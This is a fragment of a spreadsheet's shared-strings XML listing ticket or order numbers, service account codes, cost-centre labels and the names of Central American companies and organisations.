  <si>
    <t>F4619360</t>
  </si>
  <si>
    <t>F4619361</t>
  </si>
  <si>
    <t>F4619365</t>
  </si>
  <si>
    <t>F4619373</t>
  </si>
  <si>
    <t>F4619379</t>
  </si>
  <si>
    <t>F4619381</t>
  </si>
  <si>
    <t>F4619397</t>
  </si>
  <si>
    <t>F4619406</t>
  </si>
  <si>
    <t>F4548060</t>
  </si>
  <si>
    <t>F4548063</t>
  </si>
  <si>
    <t>F4548077</t>
  </si>
  <si>
    <t>423500001T</t>
  </si>
  <si>
    <t>EOLICO SAN ANTONIO EL SITIO S.A.</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4147</t>
  </si>
  <si>
    <t>F4548093</t>
  </si>
  <si>
    <t>1042550OH</t>
  </si>
  <si>
    <t>90001906940T</t>
  </si>
  <si>
    <t>939690OH</t>
  </si>
  <si>
    <t>F4548115</t>
  </si>
  <si>
    <t>F4548122</t>
  </si>
  <si>
    <t>22543200SV</t>
  </si>
  <si>
    <t>ASOC COOP DE AHORRO Y CREDITO LA VENTANA DE R.L.</t>
  </si>
  <si>
    <t>IP2037196SV</t>
  </si>
  <si>
    <t>927331OH</t>
  </si>
  <si>
    <t>F4548132</t>
  </si>
  <si>
    <t>291900003T</t>
  </si>
  <si>
    <t>F4548138</t>
  </si>
  <si>
    <t>F4548140</t>
  </si>
  <si>
    <t>F4548141</t>
  </si>
  <si>
    <t>IDG000524SV</t>
  </si>
  <si>
    <t>F4548161</t>
  </si>
  <si>
    <t>F4548165</t>
  </si>
  <si>
    <t>F4548170</t>
  </si>
  <si>
    <t>F4548175</t>
  </si>
  <si>
    <t>1656635OH</t>
  </si>
  <si>
    <t>OH1000563084/SISTEMAS APLICATIVOS SISAP S.A -</t>
  </si>
  <si>
    <t>F4548187</t>
  </si>
  <si>
    <t>F4548193</t>
  </si>
  <si>
    <t>F4548203</t>
  </si>
  <si>
    <t>F4557562</t>
  </si>
  <si>
    <t>F4557571</t>
  </si>
  <si>
    <t>F4557575</t>
  </si>
  <si>
    <t>F4557583</t>
  </si>
  <si>
    <t>F4557585</t>
  </si>
  <si>
    <t>F4557602</t>
  </si>
  <si>
    <t>F4557606</t>
  </si>
  <si>
    <t>F4557607</t>
  </si>
  <si>
    <t>F4557625</t>
  </si>
  <si>
    <t>923300002T</t>
  </si>
  <si>
    <t>EMPRESA GUATEMALTECA DE TELECOMUNICACIONES</t>
  </si>
  <si>
    <t>F4557638</t>
  </si>
  <si>
    <t>F4557642</t>
  </si>
  <si>
    <t>F4557644</t>
  </si>
  <si>
    <t>F4557674</t>
  </si>
  <si>
    <t>39200032T</t>
  </si>
  <si>
    <t>F4557718</t>
  </si>
  <si>
    <t>763638OH</t>
  </si>
  <si>
    <t>OH1000666285/INVERSIONES GENERALES SA INGESA -</t>
  </si>
  <si>
    <t>823900002T</t>
  </si>
  <si>
    <t>CONTINENTAL KOLLISION, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>823900001T</t>
  </si>
  <si>
    <t>F4588999</t>
  </si>
  <si>
    <t>F4589025</t>
  </si>
  <si>
    <t>47501178T</t>
  </si>
  <si>
    <t>47501125T</t>
  </si>
  <si>
    <t>318400030T</t>
  </si>
  <si>
    <t>F4589042</t>
  </si>
  <si>
    <t>F4589047</t>
  </si>
  <si>
    <t>F4589050</t>
  </si>
  <si>
    <t>F4589054</t>
  </si>
  <si>
    <t>F4589058</t>
  </si>
  <si>
    <t>F4589069</t>
  </si>
  <si>
    <t>F4589071</t>
  </si>
  <si>
    <t>F4589072</t>
  </si>
  <si>
    <t>F4589075</t>
  </si>
  <si>
    <t>F4589081</t>
  </si>
  <si>
    <t>F4589082</t>
  </si>
  <si>
    <t>F4589097</t>
  </si>
  <si>
    <t>ID1148061SV</t>
  </si>
  <si>
    <t>BECAS Y ESTIP. MINED, EDUC. TEC. SUPERIOR LA UNION</t>
  </si>
  <si>
    <t>ID1383114SV</t>
  </si>
  <si>
    <t>INVERSIONES CAISA, SA DE CV</t>
  </si>
  <si>
    <t>F4589134</t>
  </si>
  <si>
    <t>F4599437</t>
  </si>
  <si>
    <t>F4599478</t>
  </si>
  <si>
    <t>F4599479</t>
  </si>
  <si>
    <t>F4599485</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_TIENDA_4236</t>
  </si>
  <si>
    <t>IDG000226SV</t>
  </si>
  <si>
    <t>RETAIL SPORTS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4599507</t>
  </si>
  <si>
    <t>CONTR0002515327OC</t>
  </si>
  <si>
    <t>F4599522</t>
  </si>
  <si>
    <t>F4599523</t>
  </si>
  <si>
    <t>297401317T</t>
  </si>
  <si>
    <t>F4599531</t>
  </si>
  <si>
    <t>F4599539</t>
  </si>
  <si>
    <t>IP2029260SV</t>
  </si>
  <si>
    <t>PUNTOXPRESS S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4599550</t>
  </si>
  <si>
    <t>387000002T</t>
  </si>
  <si>
    <t>TRANSPORTES PIMAN, S.A.</t>
  </si>
  <si>
    <t>7900294T</t>
  </si>
  <si>
    <t>F4587544</t>
  </si>
  <si>
    <t>F4587545</t>
  </si>
  <si>
    <t>F4587548</t>
  </si>
  <si>
    <t>400000064T</t>
  </si>
  <si>
    <t>F4587554</t>
  </si>
  <si>
    <t>F4587590</t>
  </si>
  <si>
    <t>F4587591</t>
  </si>
  <si>
    <t>552700001T</t>
  </si>
  <si>
    <t>ESPACIO Y ERGONOMIA S.A.</t>
  </si>
  <si>
    <t>625900048T</t>
  </si>
  <si>
    <t>F4587606</t>
  </si>
  <si>
    <t>452200005T</t>
  </si>
  <si>
    <t>F4587607</t>
  </si>
  <si>
    <t>F4587609</t>
  </si>
  <si>
    <t>1397182OH</t>
  </si>
  <si>
    <t>TECOLOCO S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4587618</t>
  </si>
  <si>
    <t>F4587619</t>
  </si>
  <si>
    <t>539851OH</t>
  </si>
  <si>
    <t>F4587630</t>
  </si>
  <si>
    <t>F4587634</t>
  </si>
  <si>
    <t>ID1085008SV</t>
  </si>
  <si>
    <t>ALIMENTOS NUTRICIONALESDE EL SALVADOR S.A.DE C.V.</t>
  </si>
  <si>
    <t>F4587655</t>
  </si>
  <si>
    <t>F4587657</t>
  </si>
  <si>
    <t>F4587658</t>
  </si>
  <si>
    <t>F4587659</t>
  </si>
  <si>
    <t>F4587660</t>
  </si>
  <si>
    <t>F4587661</t>
  </si>
  <si>
    <t>F4587662</t>
  </si>
  <si>
    <t>F4587663</t>
  </si>
  <si>
    <t>F4587664</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_505</t>
  </si>
  <si>
    <t>F4587667</t>
  </si>
  <si>
    <t>F4587668</t>
  </si>
  <si>
    <t>F4587670</t>
  </si>
  <si>
    <t>F4587674</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T219</t>
  </si>
  <si>
    <t>90001906466T</t>
  </si>
  <si>
    <t>F4587682</t>
  </si>
  <si>
    <t>MP230601083SSV</t>
  </si>
  <si>
    <t>F4587695</t>
  </si>
  <si>
    <t>F4602286</t>
  </si>
  <si>
    <t>806300026T</t>
  </si>
  <si>
    <t>F4602309</t>
  </si>
  <si>
    <t>F4602310</t>
  </si>
  <si>
    <t>F4602313</t>
  </si>
  <si>
    <t>F4602327</t>
  </si>
  <si>
    <t>F4602341</t>
  </si>
  <si>
    <t>770600224T</t>
  </si>
  <si>
    <t>F4602368</t>
  </si>
  <si>
    <t>F4602372</t>
  </si>
  <si>
    <t>F4602375</t>
  </si>
  <si>
    <t>F4602385</t>
  </si>
  <si>
    <t>560600001T</t>
  </si>
  <si>
    <t>HOTEL LONGARONE, S.A.</t>
  </si>
  <si>
    <t>F4602411</t>
  </si>
  <si>
    <t>F4602412</t>
  </si>
  <si>
    <t>323800016T</t>
  </si>
  <si>
    <t>1712114OH</t>
  </si>
  <si>
    <t>OH1001074203</t>
  </si>
  <si>
    <t>F4608755</t>
  </si>
  <si>
    <t>1623504</t>
  </si>
  <si>
    <t>F4608777</t>
  </si>
  <si>
    <t>796700002T</t>
  </si>
  <si>
    <t>364100047T</t>
  </si>
  <si>
    <t>F4608783</t>
  </si>
  <si>
    <t>912400001T</t>
  </si>
  <si>
    <t>FARMACEUTICA FARMANDINA Y COMPAÑIA LIMITADA</t>
  </si>
  <si>
    <t>F4608790</t>
  </si>
  <si>
    <t>F4608792</t>
  </si>
  <si>
    <t>871700002T</t>
  </si>
  <si>
    <t>IGLESIA FRATERNIDAD CRISTIANA DE GUATEMALA</t>
  </si>
  <si>
    <t>F4608803</t>
  </si>
  <si>
    <t>F4608805</t>
  </si>
  <si>
    <t>427600004T</t>
  </si>
  <si>
    <t>SERVICIOS AEREOS GUATEMALTECOS</t>
  </si>
  <si>
    <t>F4608824</t>
  </si>
  <si>
    <t>IP2145334SV</t>
  </si>
  <si>
    <t>F4608830</t>
  </si>
  <si>
    <t>IP2124278SV</t>
  </si>
  <si>
    <t>25234600SV</t>
  </si>
  <si>
    <t>CARVAJAL EMPAQUES S.A. DE C.V.</t>
  </si>
  <si>
    <t>913600003T</t>
  </si>
  <si>
    <t>F4608850</t>
  </si>
  <si>
    <t>858900001T</t>
  </si>
  <si>
    <t>SAMCORP, S.A.</t>
  </si>
  <si>
    <t>F4608854</t>
  </si>
  <si>
    <t>F4608862</t>
  </si>
  <si>
    <t>208200008T</t>
  </si>
  <si>
    <t>F4608864</t>
  </si>
  <si>
    <t>969497OH</t>
  </si>
  <si>
    <t>47501672T</t>
  </si>
  <si>
    <t>770600097T</t>
  </si>
  <si>
    <t>F4608883</t>
  </si>
  <si>
    <t>F4608888</t>
  </si>
  <si>
    <t>F4608897</t>
  </si>
  <si>
    <t>F4554327</t>
  </si>
  <si>
    <t>F4554353</t>
  </si>
  <si>
    <t>F4554367</t>
  </si>
  <si>
    <t>F4554369</t>
  </si>
  <si>
    <t>F4554383</t>
  </si>
  <si>
    <t>F4554395</t>
  </si>
  <si>
    <t>F4554398</t>
  </si>
  <si>
    <t>F4554399</t>
  </si>
  <si>
    <t>F4554400</t>
  </si>
  <si>
    <t>F4554424</t>
  </si>
  <si>
    <t>F4619438</t>
  </si>
  <si>
    <t>F4619440</t>
  </si>
  <si>
    <t>F4619442</t>
  </si>
  <si>
    <t>F4619444</t>
  </si>
  <si>
    <t>F4619445</t>
  </si>
  <si>
    <t>F4619576</t>
  </si>
  <si>
    <t>916100006T</t>
  </si>
  <si>
    <t>F4570031</t>
  </si>
  <si>
    <t>F4570039</t>
  </si>
  <si>
    <t>F4570051</t>
  </si>
  <si>
    <t>887500027T</t>
  </si>
  <si>
    <t>F4570059</t>
  </si>
  <si>
    <t>F4570060</t>
  </si>
  <si>
    <t>F4570061</t>
  </si>
  <si>
    <t>F4570069</t>
  </si>
  <si>
    <t>F4570070</t>
  </si>
  <si>
    <t>F4570076</t>
  </si>
  <si>
    <t>F4570085</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_114</t>
  </si>
  <si>
    <t>928900001T</t>
  </si>
  <si>
    <t>JD TEXTILES, S.A</t>
  </si>
  <si>
    <t>F4570099</t>
  </si>
  <si>
    <t>F4570101</t>
  </si>
  <si>
    <t>F4570103</t>
  </si>
  <si>
    <t>922200001T</t>
  </si>
  <si>
    <t>CORPORACION DE TRANSPORTES CHARLLY, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4570106</t>
  </si>
  <si>
    <t>90001908993T</t>
  </si>
  <si>
    <t>F4570108</t>
  </si>
  <si>
    <t>F4570125</t>
  </si>
  <si>
    <t>F4570150</t>
  </si>
  <si>
    <t>699100001T</t>
  </si>
  <si>
    <t>E-NET S.A (AGRICOM)</t>
  </si>
  <si>
    <t>F4570168</t>
  </si>
  <si>
    <t>F4570176</t>
  </si>
  <si>
    <t>F4570179</t>
  </si>
  <si>
    <t>F4558074</t>
  </si>
  <si>
    <t>F4558075</t>
  </si>
  <si>
    <t>90001909168T</t>
  </si>
  <si>
    <t>F4558085</t>
  </si>
  <si>
    <t>CONTR0002053213OC</t>
  </si>
  <si>
    <t>LLAMAME CALL CENTER SRL</t>
  </si>
  <si>
    <t>F4558101</t>
  </si>
  <si>
    <t>CONTR0002187653OC</t>
  </si>
  <si>
    <t>863400330T</t>
  </si>
  <si>
    <t>863400361T</t>
  </si>
  <si>
    <t>F4558124</t>
  </si>
  <si>
    <t>F4558135</t>
  </si>
  <si>
    <t>90001903895T</t>
  </si>
  <si>
    <t>F4558149</t>
  </si>
  <si>
    <t>90001909768T</t>
  </si>
  <si>
    <t>F4558181</t>
  </si>
  <si>
    <t>F4558182</t>
  </si>
  <si>
    <t>F4558187</t>
  </si>
  <si>
    <t>F4558200</t>
  </si>
  <si>
    <t>F4558201</t>
  </si>
  <si>
    <t>5313484ON</t>
  </si>
  <si>
    <t>F4589950</t>
  </si>
  <si>
    <t>25251500SV</t>
  </si>
  <si>
    <t>ASI ASISTENCIA INTERNACIONAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4589965</t>
  </si>
  <si>
    <t>F4589974</t>
  </si>
  <si>
    <t>F4589975</t>
  </si>
  <si>
    <t>F4589990</t>
  </si>
  <si>
    <t>297400539T</t>
  </si>
  <si>
    <t>F4589992</t>
  </si>
  <si>
    <t>F4589993</t>
  </si>
  <si>
    <t>F4589994</t>
  </si>
  <si>
    <t>F4590006</t>
  </si>
  <si>
    <t>F4590008</t>
  </si>
  <si>
    <t>568100001T</t>
  </si>
  <si>
    <t>GRUPO MT, S.A.</t>
  </si>
  <si>
    <t>F4590016</t>
  </si>
  <si>
    <t>F4590041</t>
  </si>
  <si>
    <t>F4590048</t>
  </si>
  <si>
    <t>F4590051</t>
  </si>
  <si>
    <t>297400116T</t>
  </si>
  <si>
    <t>F4590063</t>
  </si>
  <si>
    <t>F4590066</t>
  </si>
  <si>
    <t>F4590069</t>
  </si>
  <si>
    <t>22317500SV</t>
  </si>
  <si>
    <t>F4590086</t>
  </si>
  <si>
    <t>297400766T</t>
  </si>
  <si>
    <t>71100025T</t>
  </si>
  <si>
    <t>F4590096</t>
  </si>
  <si>
    <t>452609ON</t>
  </si>
  <si>
    <t>F4599579</t>
  </si>
  <si>
    <t>22056900SV</t>
  </si>
  <si>
    <t>FUNDACION UNIVERSITARIA IBEROAMERICANA</t>
  </si>
  <si>
    <t>F4599586</t>
  </si>
  <si>
    <t>770600061T</t>
  </si>
  <si>
    <t>F4599612</t>
  </si>
  <si>
    <t>450798ON</t>
  </si>
  <si>
    <t>580900007T</t>
  </si>
  <si>
    <t>CONTR0002801379OC</t>
  </si>
  <si>
    <t>F4599633</t>
  </si>
  <si>
    <t>F4599635</t>
  </si>
  <si>
    <t>F4599640</t>
  </si>
  <si>
    <t>F4599642</t>
  </si>
  <si>
    <t>F4599647</t>
  </si>
  <si>
    <t>F4599650</t>
  </si>
  <si>
    <t>921500020T</t>
  </si>
  <si>
    <t>F4599663</t>
  </si>
  <si>
    <t>IP2099103SV</t>
  </si>
  <si>
    <t>F4599687</t>
  </si>
  <si>
    <t>924419OH</t>
  </si>
  <si>
    <t>OH1000760895/SOLUCIONES Y SERVICIOS DE HONDURAS SOLUSERSA -</t>
  </si>
  <si>
    <t>CONTR0001491581OC</t>
  </si>
  <si>
    <t>CONTR0001491585OC</t>
  </si>
  <si>
    <t>F4599699</t>
  </si>
  <si>
    <t>F4599723</t>
  </si>
  <si>
    <t>F4589472</t>
  </si>
  <si>
    <t>F4589475</t>
  </si>
  <si>
    <t>F4589482</t>
  </si>
  <si>
    <t>F4589489</t>
  </si>
  <si>
    <t>F4589494</t>
  </si>
  <si>
    <t>F4589497</t>
  </si>
  <si>
    <t>F4589500</t>
  </si>
  <si>
    <t>F4589503</t>
  </si>
  <si>
    <t>F4589510</t>
  </si>
  <si>
    <t>11400104T</t>
  </si>
  <si>
    <t>F4589515</t>
  </si>
  <si>
    <t>F4589534</t>
  </si>
  <si>
    <t>F4589554</t>
  </si>
  <si>
    <t>F4589555</t>
  </si>
  <si>
    <t>F4589564</t>
  </si>
  <si>
    <t>F4589571</t>
  </si>
  <si>
    <t>CC_FUNDGENESIS_GT_SAN_JUAN_016</t>
  </si>
  <si>
    <t>ID1026341SV</t>
  </si>
  <si>
    <t>705000OH</t>
  </si>
  <si>
    <t>F4603965</t>
  </si>
  <si>
    <t>F4603966</t>
  </si>
  <si>
    <t>F4603971</t>
  </si>
  <si>
    <t>F4603975</t>
  </si>
  <si>
    <t>F4603995</t>
  </si>
  <si>
    <t>668900013T</t>
  </si>
  <si>
    <t>767000004T</t>
  </si>
  <si>
    <t>767000002T</t>
  </si>
  <si>
    <t>F4604012</t>
  </si>
  <si>
    <t>292900002T</t>
  </si>
  <si>
    <t>F4604017</t>
  </si>
  <si>
    <t>F4604025</t>
  </si>
  <si>
    <t>F4604027</t>
  </si>
  <si>
    <t>7800226T</t>
  </si>
  <si>
    <t>1744883OH</t>
  </si>
  <si>
    <t>F4604057</t>
  </si>
  <si>
    <t>F4604066</t>
  </si>
  <si>
    <t>F4604072</t>
  </si>
  <si>
    <t>F4604080</t>
  </si>
  <si>
    <t>F4604084</t>
  </si>
  <si>
    <t>F4604085</t>
  </si>
  <si>
    <t>F4609557</t>
  </si>
  <si>
    <t>F4609569</t>
  </si>
  <si>
    <t>F4609636</t>
  </si>
  <si>
    <t>F4609651</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0156</t>
  </si>
  <si>
    <t>F4555143</t>
  </si>
  <si>
    <t>F4555147</t>
  </si>
  <si>
    <t>F4555155</t>
  </si>
  <si>
    <t>F4555192</t>
  </si>
  <si>
    <t>F4555196</t>
  </si>
  <si>
    <t>F4555204</t>
  </si>
  <si>
    <t>F4555205</t>
  </si>
  <si>
    <t>F4555213</t>
  </si>
  <si>
    <t>F4555217</t>
  </si>
  <si>
    <t>F4555221</t>
  </si>
  <si>
    <t>F4555226</t>
  </si>
  <si>
    <t>F4555247</t>
  </si>
  <si>
    <t>F4555277</t>
  </si>
  <si>
    <t>F4588366</t>
  </si>
  <si>
    <t>F4588413</t>
  </si>
  <si>
    <t>F4588448</t>
  </si>
  <si>
    <t>F4620080</t>
  </si>
  <si>
    <t>F4620086</t>
  </si>
  <si>
    <t>1253663OH</t>
  </si>
  <si>
    <t>916100001T</t>
  </si>
  <si>
    <t>F4620112</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_PUNTO_CENTRAL_BK</t>
  </si>
  <si>
    <t>758500021T</t>
  </si>
  <si>
    <t>346100122T</t>
  </si>
  <si>
    <t>F4620125</t>
  </si>
  <si>
    <t>910400125T</t>
  </si>
  <si>
    <t>F4620136</t>
  </si>
  <si>
    <t>8901471T</t>
  </si>
  <si>
    <t>8901472T</t>
  </si>
  <si>
    <t>F4620157</t>
  </si>
  <si>
    <t>F4620163</t>
  </si>
  <si>
    <t>8901473T</t>
  </si>
  <si>
    <t>F4620166</t>
  </si>
  <si>
    <t>F4620175</t>
  </si>
  <si>
    <t>ID1306000SV</t>
  </si>
  <si>
    <t>FUNDACION REFUGIO SALVAJE</t>
  </si>
  <si>
    <t>758500330T</t>
  </si>
  <si>
    <t>F4620181</t>
  </si>
  <si>
    <t>F4620183</t>
  </si>
  <si>
    <t>F4620191</t>
  </si>
  <si>
    <t>22312600SV</t>
  </si>
  <si>
    <t>F4620199</t>
  </si>
  <si>
    <t>F4620200</t>
  </si>
  <si>
    <t>758500492T</t>
  </si>
  <si>
    <t>8902587T</t>
  </si>
  <si>
    <t>8901680T</t>
  </si>
  <si>
    <t>F4620229</t>
  </si>
  <si>
    <t>MP222801025SSV</t>
  </si>
  <si>
    <t>F4560665</t>
  </si>
  <si>
    <t>F4560677</t>
  </si>
  <si>
    <t>99900289T</t>
  </si>
  <si>
    <t>F4560687</t>
  </si>
  <si>
    <t>F4560699</t>
  </si>
  <si>
    <t>F4560702</t>
  </si>
  <si>
    <t>4879541ON</t>
  </si>
  <si>
    <t>F4590100</t>
  </si>
  <si>
    <t>F4590101</t>
  </si>
  <si>
    <t>F4590102</t>
  </si>
  <si>
    <t>F4590104</t>
  </si>
  <si>
    <t>F4590106</t>
  </si>
  <si>
    <t>F4590114</t>
  </si>
  <si>
    <t>F4590124</t>
  </si>
  <si>
    <t>F4590140</t>
  </si>
  <si>
    <t>F4590175</t>
  </si>
  <si>
    <t>349900099T</t>
  </si>
  <si>
    <t>F4590200</t>
  </si>
  <si>
    <t>F4590241</t>
  </si>
  <si>
    <t>F4590248</t>
  </si>
  <si>
    <t>F4590249</t>
  </si>
  <si>
    <t>F4590258</t>
  </si>
  <si>
    <t>F4590262</t>
  </si>
  <si>
    <t>306900008T</t>
  </si>
  <si>
    <t>UMBRAL S.A.</t>
  </si>
  <si>
    <t>1036954OH</t>
  </si>
  <si>
    <t>1036875OH</t>
  </si>
  <si>
    <t>F4600047</t>
  </si>
  <si>
    <t>F4600057</t>
  </si>
  <si>
    <t>F4600059</t>
  </si>
  <si>
    <t>F4600067</t>
  </si>
  <si>
    <t>F4600068</t>
  </si>
  <si>
    <t>F4600071</t>
  </si>
  <si>
    <t>F4600072</t>
  </si>
  <si>
    <t>F4600073</t>
  </si>
  <si>
    <t>F4600078</t>
  </si>
  <si>
    <t>F4600086</t>
  </si>
  <si>
    <t>F4600099</t>
  </si>
  <si>
    <t>F4600100</t>
  </si>
  <si>
    <t>F4600101</t>
  </si>
  <si>
    <t>F4600102</t>
  </si>
  <si>
    <t>F4600108</t>
  </si>
  <si>
    <t>F4600110</t>
  </si>
  <si>
    <t>926227OH</t>
  </si>
  <si>
    <t>F4600112</t>
  </si>
  <si>
    <t>F4600113</t>
  </si>
  <si>
    <t>F4600114</t>
  </si>
  <si>
    <t>5402234ON</t>
  </si>
  <si>
    <t>24024444SV</t>
  </si>
  <si>
    <t>DISTRIBUIDORA FERRETERA SALVADOREÑA,S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4600122</t>
  </si>
  <si>
    <t>F4600135</t>
  </si>
  <si>
    <t>7300292T</t>
  </si>
  <si>
    <t>F4600145</t>
  </si>
  <si>
    <t>F4600156</t>
  </si>
  <si>
    <t>F4600162</t>
  </si>
  <si>
    <t>F4600168</t>
  </si>
  <si>
    <t>F4600169</t>
  </si>
  <si>
    <t>F4600171</t>
  </si>
  <si>
    <t>F4600174</t>
  </si>
  <si>
    <t>3550971ON</t>
  </si>
  <si>
    <t>F4539160</t>
  </si>
  <si>
    <t>F4589623</t>
  </si>
  <si>
    <t>F4589624</t>
  </si>
  <si>
    <t>F4589625</t>
  </si>
  <si>
    <t>F4589626</t>
  </si>
  <si>
    <t>F4589627</t>
  </si>
  <si>
    <t>F4589628</t>
  </si>
  <si>
    <t>F4589629</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3112</t>
  </si>
  <si>
    <t>39200035T</t>
  </si>
  <si>
    <t>F4589775</t>
  </si>
  <si>
    <t>F4604951</t>
  </si>
  <si>
    <t>F4604957</t>
  </si>
  <si>
    <t>F4605072</t>
  </si>
  <si>
    <t>F4605075</t>
  </si>
  <si>
    <t>F4605076</t>
  </si>
  <si>
    <t>F4605078</t>
  </si>
  <si>
    <t>F4605079</t>
  </si>
  <si>
    <t>F4605081</t>
  </si>
  <si>
    <t>F4605107</t>
  </si>
  <si>
    <t>F4609813</t>
  </si>
  <si>
    <t>F4609826</t>
  </si>
  <si>
    <t>F4609832</t>
  </si>
  <si>
    <t>F4609853</t>
  </si>
  <si>
    <t>F4609881</t>
  </si>
  <si>
    <t>F4609882</t>
  </si>
  <si>
    <t>F4555682</t>
  </si>
  <si>
    <t>F4555692</t>
  </si>
  <si>
    <t>F4555698</t>
  </si>
  <si>
    <t>F4555700</t>
  </si>
  <si>
    <t>F4555706</t>
  </si>
  <si>
    <t>625900259T</t>
  </si>
  <si>
    <t>770600182T</t>
  </si>
  <si>
    <t>F4555764</t>
  </si>
  <si>
    <t>F4555777</t>
  </si>
  <si>
    <t>CC_GMG_GT_INTERNET_TIENDA_004</t>
  </si>
  <si>
    <t>F4555781</t>
  </si>
  <si>
    <t>F4555790</t>
  </si>
  <si>
    <t>F4555798</t>
  </si>
  <si>
    <t>F4594049</t>
  </si>
  <si>
    <t>F4594051</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_EL_ENCINAL</t>
  </si>
  <si>
    <t>F4594062</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_SKALA_N2_F3</t>
  </si>
  <si>
    <t>F4594069</t>
  </si>
  <si>
    <t>F4594072</t>
  </si>
  <si>
    <t>382800001T</t>
  </si>
  <si>
    <t>90001907898T</t>
  </si>
  <si>
    <t>344400728T</t>
  </si>
  <si>
    <t>382800003T</t>
  </si>
  <si>
    <t>90001910523T</t>
  </si>
  <si>
    <t>1010751OH</t>
  </si>
  <si>
    <t>382800007T</t>
  </si>
  <si>
    <t>90001910570T</t>
  </si>
  <si>
    <t>323000004T</t>
  </si>
  <si>
    <t>INDUSTRIA FARMACEUTICA S.A.</t>
  </si>
  <si>
    <t>F4594112</t>
  </si>
  <si>
    <t>F4594113</t>
  </si>
  <si>
    <t>F4594118</t>
  </si>
  <si>
    <t>923200001T</t>
  </si>
  <si>
    <t>MOTOREPUESTOS ACQUARONI, S.A.</t>
  </si>
  <si>
    <t>90001904194T</t>
  </si>
  <si>
    <t>F4594125</t>
  </si>
  <si>
    <t>F4594134</t>
  </si>
  <si>
    <t>3400064ON</t>
  </si>
  <si>
    <t>F4594140</t>
  </si>
  <si>
    <t>3400070ON</t>
  </si>
  <si>
    <t>F4594145</t>
  </si>
  <si>
    <t>535200018T</t>
  </si>
  <si>
    <t>F4594147</t>
  </si>
  <si>
    <t>F4594157</t>
  </si>
  <si>
    <t>349400025T</t>
  </si>
  <si>
    <t>F4594178</t>
  </si>
  <si>
    <t>F4594179</t>
  </si>
  <si>
    <t>349400077T</t>
  </si>
  <si>
    <t>F4594186</t>
  </si>
  <si>
    <t>770600168T</t>
  </si>
  <si>
    <t>F4620735</t>
  </si>
  <si>
    <t>F4620740</t>
  </si>
  <si>
    <t>F4620779</t>
  </si>
  <si>
    <t>F4620791</t>
  </si>
  <si>
    <t>F4620792</t>
  </si>
  <si>
    <t>CC_GYT_GT_INTERNET_AGENCIA_018</t>
  </si>
  <si>
    <t>F4620794</t>
  </si>
  <si>
    <t>F4620839</t>
  </si>
  <si>
    <t>F4620859</t>
  </si>
  <si>
    <t>F4620872</t>
  </si>
  <si>
    <t>272500020T</t>
  </si>
  <si>
    <t>834700001T</t>
  </si>
  <si>
    <t>ASESORIA ESPECIALIZADA, S.A.</t>
  </si>
  <si>
    <t>F4563791</t>
  </si>
  <si>
    <t>F4563796</t>
  </si>
  <si>
    <t>F4563797</t>
  </si>
  <si>
    <t>F4563817</t>
  </si>
  <si>
    <t>F4563820</t>
  </si>
  <si>
    <t>F4563837</t>
  </si>
  <si>
    <t>F4563840</t>
  </si>
  <si>
    <t>F4563845</t>
  </si>
  <si>
    <t>F4563847</t>
  </si>
  <si>
    <t>F4563856</t>
  </si>
  <si>
    <t>344400052T</t>
  </si>
  <si>
    <t>F4563860</t>
  </si>
  <si>
    <t>F4563867</t>
  </si>
  <si>
    <t>F4563868</t>
  </si>
  <si>
    <t>F4590445</t>
  </si>
  <si>
    <t>F4590455</t>
  </si>
  <si>
    <t>F4590490</t>
  </si>
  <si>
    <t>F4590496</t>
  </si>
  <si>
    <t>F4590514</t>
  </si>
  <si>
    <t>F4590515</t>
  </si>
  <si>
    <t>F4590560</t>
  </si>
  <si>
    <t>F4590598</t>
  </si>
  <si>
    <t>F4590599</t>
  </si>
  <si>
    <t>F4600183</t>
  </si>
  <si>
    <t>90001902818T</t>
  </si>
  <si>
    <t>F4600194</t>
  </si>
  <si>
    <t>F4600200</t>
  </si>
  <si>
    <t>F4600201</t>
  </si>
  <si>
    <t>F4600203</t>
  </si>
  <si>
    <t>IP2043006SV</t>
  </si>
  <si>
    <t>17400477T</t>
  </si>
  <si>
    <t>F4600214</t>
  </si>
  <si>
    <t>F4600215</t>
  </si>
  <si>
    <t>F4600221</t>
  </si>
  <si>
    <t>F4600237</t>
  </si>
  <si>
    <t>5117747ON</t>
  </si>
  <si>
    <t>F4600245</t>
  </si>
  <si>
    <t>90001903334T</t>
  </si>
  <si>
    <t>F4600260</t>
  </si>
  <si>
    <t>F4600263</t>
  </si>
  <si>
    <t>F4600274</t>
  </si>
  <si>
    <t>F4600278</t>
  </si>
  <si>
    <t>F4600283</t>
  </si>
  <si>
    <t>288700037T</t>
  </si>
  <si>
    <t>361700115T</t>
  </si>
  <si>
    <t>361700070T</t>
  </si>
  <si>
    <t>F4600301</t>
  </si>
  <si>
    <t>331800153T</t>
  </si>
  <si>
    <t>F4600321</t>
  </si>
  <si>
    <t>F4600338</t>
  </si>
  <si>
    <t>61200135T</t>
  </si>
  <si>
    <t>F4589811</t>
  </si>
  <si>
    <t>F4589818</t>
  </si>
  <si>
    <t>F4589834</t>
  </si>
  <si>
    <t>F4589836</t>
  </si>
  <si>
    <t>F4589843</t>
  </si>
  <si>
    <t>F4589854</t>
  </si>
  <si>
    <t>F4589865</t>
  </si>
  <si>
    <t>47501499T</t>
  </si>
  <si>
    <t>F4589876</t>
  </si>
  <si>
    <t>F4589883</t>
  </si>
  <si>
    <t>ID1026262SV</t>
  </si>
  <si>
    <t>25559100SV</t>
  </si>
  <si>
    <t>F4589904</t>
  </si>
  <si>
    <t>5003242ON</t>
  </si>
  <si>
    <t>284500072T</t>
  </si>
  <si>
    <t>F4589913</t>
  </si>
  <si>
    <t>F4589914</t>
  </si>
  <si>
    <t>F4589915</t>
